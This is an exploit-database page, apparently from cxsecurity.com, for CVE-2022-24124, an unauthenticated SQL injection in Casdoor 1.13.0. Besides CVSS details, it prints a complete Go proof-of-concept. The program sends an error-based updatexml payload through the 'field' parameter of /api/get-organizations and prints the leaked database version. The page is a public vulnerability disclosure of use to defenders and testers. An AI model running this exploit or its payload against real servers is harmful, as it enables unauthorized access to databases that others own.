Casdoor 1.13.0 SQL Injection

2022.03.01
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

// Exploit Title: Casdoor 1.13.0 SQL Injection (Unauthenticated) // Date: 2022-02-25 // Exploit Author: Mayank Deshmukh // Vendor Homepage: https://casdoor.org/ // Software Link: https://github.com/casdoor/casdoor/releases/tag/v1.13.0 // Version: version < 1.13.1 // Security Advisory: https://github.com/advisories/GHSA-m358-g4rp-533r // Tested on: Kali Linux // CVE : CVE-2022-24124 // Github POC: https://github.com/ColdFusionX/CVE-2022-24124 // Exploit Usage : go run exploit.go -u http://127.0.0.1:8080 package main import ( "flag" "fmt" "html" "io/ioutil" "net/http" "os" "regexp" "strings" ) func main() { var url string flag.StringVar(&url, "u", "", "Casdoor URL (ex. http://127.0.0.1:8080)") flag.Parse() banner := ` -=Casdoor SQL Injection (CVE-2022-24124)=- - by Mayank Deshmukh (ColdFusionX) ` fmt.Printf(banner) fmt.Println("[*] Dumping Database Version") response, err := http.Get(url + "/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(null,version(),null)") if err != nil { panic(err) } defer response.Body.Close() databytes, err := ioutil.ReadAll(response.Body) if err != nil { panic(err) } content := string(databytes) re := regexp.MustCompile("(?i)(XPATH syntax error.*&#39)") result := re.FindAllString(content, -1) sqliop := fmt.Sprint(result) replacer := strings.NewReplacer("[", "", "]", "", "&#39", "", ";", "") finalop := replacer.Replace(sqliop) fmt.Println(html.UnescapeString(finalop)) if result == nil { fmt.Printf("Application not vulnerable\n") os.Exit(1) } }


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top